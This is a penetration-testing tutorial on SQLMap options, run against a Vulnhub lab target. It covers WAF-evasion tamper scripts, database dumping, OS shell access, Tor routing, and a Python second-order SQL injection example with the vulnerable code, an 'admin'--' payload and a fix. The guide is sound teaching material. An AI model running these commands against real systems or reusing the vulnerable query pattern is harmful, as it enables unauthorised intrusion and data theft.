Important SQLMap Commands
Introduction
SQLMap can be found in every penetration tester's toolbox. It is one of the most popular and powerful tools for finding and exploiting SQL injection, a vulnerability class that sits in the OWASP Top 10 (Injection). It covers the whole chain: confirming that an injection exists, extracting database names, tables and columns, dumping data and, where privileges allow, taking over the underlying host.
In this article we will look at the SQLMap options that come in handy in different SQL injection scenarios.
SQLMap can be downloaded with the following command:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
For demo purposes, I'm using this machine from Vulnhub.
Let's look at the basic use of the SQLMap tool for GET and POST requests.
GET request
sqlmap -u "http://site-to-test.com/test.php?id=1" -p id
-p id: test only the id parameter. If -p is omitted, SQLMap tests every GET/POST parameter it finds; you can also mark an exact injection point by appending * to a value in the URL (for example id=1*).
POST request
We can provide the body of the POST request with --data; SQLMap then tests the parameters it contains (here only user, because of -p).
sqlmap -u "http://site-to-test.com/admin/index.php" --data="user=admin&password=admin" -p user
Another way is to save the raw HTTP request from Burp to a file and pass it to SQLMap, which takes the method, headers, cookies and body from the file:
sqlmap -r <path to request file>
Let's move forward a bit to understand the other options provided by the SQLMap tool.
Scanning login pages
Pages behind a login are protected by a session cookie that the browser sends in the Cookie request header. To scan such pages we must give SQLMap a valid cookie value, otherwise every request is bounced back to the login form.
sqlmap -u "http://192.168.202.163/admin/index.php?id=1" --cookie="cookie value"
Here /admin/index.php?id=1 is a page in the admin area that is reachable only after logging in.
Likewise, some pages check the User-Agent or Referer header. These can be set on the command line as well:
sqlmap -u "http://192.168.202.163/admin/index.php?id=1" --user-agent=infosec
--referer works the same way. Additionally, --random-agent picks a random browser User-Agent from SQLMap's built-in list instead of sending the default one, which identifies the tool.
Crawling
--crawl makes SQLMap follow links from the given URL and test every page it discovers. The depth is set in the command:
sqlmap -u "http://192.168.202.160/" --crawl=1
--crawl=N: follow links up to N levels deep from the start URL (a value of 2 follows the links on the start page and the links on the pages they lead to).
If we want to exclude pages from the crawl, we can define them with --crawl-exclude, which takes a regular expression. This matters when scanning an authenticated site: following a logout link kills the session.
sqlmap -u "http://192.168.202.163/" --crawl=3 --cookie="cookie value" --crawl-exclude="logout"
This command crawls the website three levels deep and skips any URL that matches "logout".
With the option set, SQLMap crawled the website but left the logout URL alone.
Running the same command without --crawl-exclude, SQLMap requested the logout URL. That invalidated the session cookie, so the remaining authenticated pages could no longer be reached and the scan did not complete.
SQLMap through proxy
--proxy sends all of SQLMap's traffic through an HTTP proxy. To inspect the requests in Burp, start Burp Suite with its listener on localhost port 8080 and run:
sqlmap -u "http://192.168.202.162/cat.php?id=1" -p id --proxy="http://localhost:8080"
Now think of a scenario where the server blacklists SQL keywords such as ORDER BY and UNION with a case-sensitive filter. We can route SQLMap through Burp and use Burp's Match and Replace feature to rewrite the payloads before they reach the server.
The Match and Replace feature is found under Proxy > Options in Burp.
With a rule that matches "union" in the request and replaces it with "UnIoN", every payload containing that keyword goes out in mixed case. This only defeats a filter that compares case-sensitively, and SQLMap can do the same rewriting itself with --tamper=randomcase, without a proxy in the path.
If the application is reachable only through a proxy that requires authentication, supply the credentials with --proxy-cred:
sqlmap -u "http://192.168.202.162/cat.php?id=1" -p id --proxy="http://localhost:8080" --proxy-cred=username:password
Batch
--batch is for non-interactive runs. SQLMap regularly stops to ask questions: during a crawl it asks whether to test each URL it found, and elsewhere whether to follow a redirect or skip payloads for other DBMSs. With --batch the tool takes the default answer to every prompt and carries on without user input.
Forms
The URL of a page that contains a form (such as a login page) can be given with --forms; SQLMap parses the HTML, extracts the form's action and input fields and tests them as it would POST parameters.
Pages with many form fields are tested efficiently by combining --forms with --batch: the page is parsed, the fields are discovered and SQLMap fills in default values instead of asking about each one.
To cover the whole application, add --crawl so that the forms on every discovered page are tested as well.
Threads
--threads controls how many concurrent HTTP requests SQLMap sends (default 1, maximum 10). More threads shorten the overall run, but for time-based blind injection concurrency skews the response timings the detection relies on, so keep the value low in that case.
Risk and Level
--risk controls how intrusive the payloads are. It defaults to 1 and goes up to 3. Risk 2 adds heavy time-based queries; risk 3 adds OR-based boolean payloads, which can modify data if the injection point sits inside an UPDATE or DELETE statement, so use it with care.
--level controls how many checks are performed and which inputs are tested. It ranges from 1 to 5. Higher levels send more payloads per parameter, and from level 2 the Cookie header is tested, from level 3 the User-Agent and Referer headers as well.
Increase both when SQLMap cannot detect an injection with the defaults, for example --level=5 --risk=3 for a thorough pass against a single parameter.
Verbose output
To see the payloads SQLMap actually sends, raise the verbosity with -v. Levels run from 0 to 6; the default is 1, level 3 prints the injected payloads and level 6 also dumps the full HTTP responses.
Database enumeration
Since SQLMap is mainly used to exploit SQL injection, let's look at the commands that enumerate a database through a vulnerable parameter. Each step below runs against the same target, http://192.168.202.163/cat.php?id=2.
1. --dbs lists the databases the injected user can see.
2. Once we have a database name, -D photoblog --tables lists the tables of the "photoblog" database.
3. -D photoblog -T users --columns lists the columns of the "users" table.
4. -D photoblog -T users --dump dumps the rows of the "users" table; SQLMap also offers to crack any password hashes it recognises in the output.
5. To identify the current database user:
sqlmap -u "http://192.168.202.163/cat.php?id=2" --current-user
6. To determine the current database name:
sqlmap -u "http://192.168.202.163/cat.php?id=2" --current-db
7. To determine privileges, roles, whether the current user is a DBA, and the database server's hostname:
sqlmap -u "http://192.168.202.163/cat.php?id=2" --privileges --roles --is-dba --hostname
Bypass WAF with Tamper Scripts
Often an application sits behind a Web Application Firewall (WAF). Current SQLMap versions check for this automatically and report that heuristics detected a WAF/IPS in front of the target (older versions exposed the check as a dedicated switch; --skip-waf turns the heuristic off).
Once a WAF is identified, tamper scripts can be used to attack the protected application. A tamper script rewrites each payload before it is sent, for example changing keyword case or replacing spaces with comments, so that a signature no longer matches. The scripts live in the tamper/ directory of the SQLMap installation (/usr/share/sqlmap/tamper/ on Kali); --list-tampers prints them, and --tamper=space2comment,randomcase applies several in sequence. Which scripts work depends on the WAF and the DBMS, so try them against the blocked payload rather than stacking all of them.
Running system commands
SQLMap can run operating system commands on the database server if the current database user has DBA privileges and the DBMS offers a way out: on MySQL and PostgreSQL it either writes a web shell into a writable web root or loads a user-defined function, on Microsoft SQL Server it calls xp_cmdshell, so a writable web directory or support for stacked queries is also required. The options are:
sqlmap -u "http://192.168.202.162/cat.php?id=1" --os-shell
sqlmap -u "http://192.168.202.162/cat.php?id=1" --os-cmd <cmd>
--os-shell gives an interactive prompt; --os-cmd runs a single command and returns its output.
Executing SQL queries
--sql-shell opens an interactive prompt on which arbitrary SQL statements are run through the injection point:
sqlmap -u "http://192.168.202.164/cat.php?id=2" --sql-shell
For a single statement, --sql-query="SELECT @@version" does the same without the prompt.
Other options
1. Scanning a page protected by HTTP authentication such as Basic, Digest or NTLM:
sqlmap -u "http://example.com/admin.aspx" --auth-type Basic --auth-cred "admin:admin"
2. Scanning a page protected by client-certificate (key-based) authentication:
sqlmap -u "http://example.com/admin.aspx" --auth-file=<path to the PEM certificate or key file>
3. To route the traffic through the Tor network, so that requests reach the target from Tor exit nodes rather than from the tester's own address (this makes IP tracking harder; it does not stop a WAF from fingerprinting the scanner's behaviour):
sqlmap -u "http://example.com/admin.aspx" --tor
sqlmap -u "http://example.com/admin.aspx" --tor-port=<tor proxy port>
--check-tor verifies that the traffic really leaves through Tor before testing starts.
4. If you need a delay between HTTP requests (here, one second):
sqlmap -u "http://example.com/admin.aspx" --delay=1
5. If the page is protected with an anti-CSRF token, tell SQLMap the name of the parameter that carries it; SQLMap then fetches a fresh token before each request instead of reusing a stale one:
sqlmap -u "http://example.com/admin.aspx" --csrf-token=<name of the token parameter>
If the token has to be fetched from a different page, add --csrf-url=<URL of that page>.
6. Second-order SQL injection. Here the payload is stored by one request and only executed when a different page reads it back later, so the response to the injecting request shows nothing. We give SQLMap the URL of that second page and it requests it after every injection to observe the result:
sqlmap -r /root/Desktop/Burp.txt --second-order "http://target/vulnerablepage.php"
The Burp.txt file contains the request in which the payload is injected.
--second-order takes the URL that SQLMap visits after each injection to check its effect.
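To make the second-order case concrete, here is an added example (Python with sqlite3, written for this article and not taken from the original page or from SQLMap) of the two-step pattern --second-order is designed to catch: a registration step that stores the payload safely, and a later password-change step that reads the stored value back and concatenates it into a new statement. The schema, the account names and the "admin'--" payload are constructed for the example; a hardened version of the second step is shown beside the vulnerable one.

```python
# Added example: minimal second-order SQL injection, vulnerable and fixed.
import sqlite3


def setup_db():
    """Constructed sample schema with one admin account (sample data, not real)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", ("admin", "S3cret!"))
    conn.commit()
    return conn


def register(conn, username, password):
    """Step 1, the injection point. The INSERT is parameterised, so the request
    succeeds and returns a normal response: a scanner looking only at this
    response sees nothing. The malicious username is simply stored."""
    cur = conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))
    conn.commit()
    return cur.lastrowid


def change_password_vulnerable(conn, user_id, new_password):
    """Step 2, the second-order page. The stored username is trusted because it
    'came from the database' and is concatenated into a new statement. With the
    username admin'-- the WHERE clause becomes username = 'admin'-- and the
    trailing quote is commented out, so admin's password is overwritten."""
    (stored_name,) = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    sql = "UPDATE users SET password = '%s' WHERE username = '%s'" % (new_password, stored_name)
    conn.execute(sql)
    conn.commit()
    return sql


def change_password_safe(conn, user_id, new_password):
    """Hardened step 2: the value read back from the database is bound as a
    parameter like any other untrusted input, so the quote and comment stay data."""
    (stored_name,) = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    conn.execute("UPDATE users SET password = ? WHERE username = ?", (new_password, stored_name))
    conn.commit()


def password_of(conn, username):
    row = conn.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()
    return row[0] if row else None


def demo(vulnerable=True):
    """Run the two-step attack and return admin's password afterwards."""
    conn = setup_db()
    uid = register(conn, "admin'--", "whatever")        # step 1: stored, no error, no signal
    if vulnerable:
        change_password_vulnerable(conn, uid, "pwned")  # step 2: the effect appears here
    else:
        change_password_safe(conn, uid, "pwned")
    return password_of(conn, "admin")


if __name__ == "__main__":
    print("vulnerable:", demo(vulnerable=True))
    print("hardened:  ", demo(vulnerable=False))
```

The point for scanning is visible in demo(): nothing in the response to register() reveals the injection, and only a request to the password-change page shows the damage. That is exactly why SQLMap needs --second-order to be pointed at the page that consumes the stored value; without it, the injecting request looks clean.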
Conclusion
SQLMap is a good tool for discovering and exploiting SQL injection vulnerabilities. With so many options supported and the ability to create and use various customizations, it stands out from many other open source SQL injection testing tools.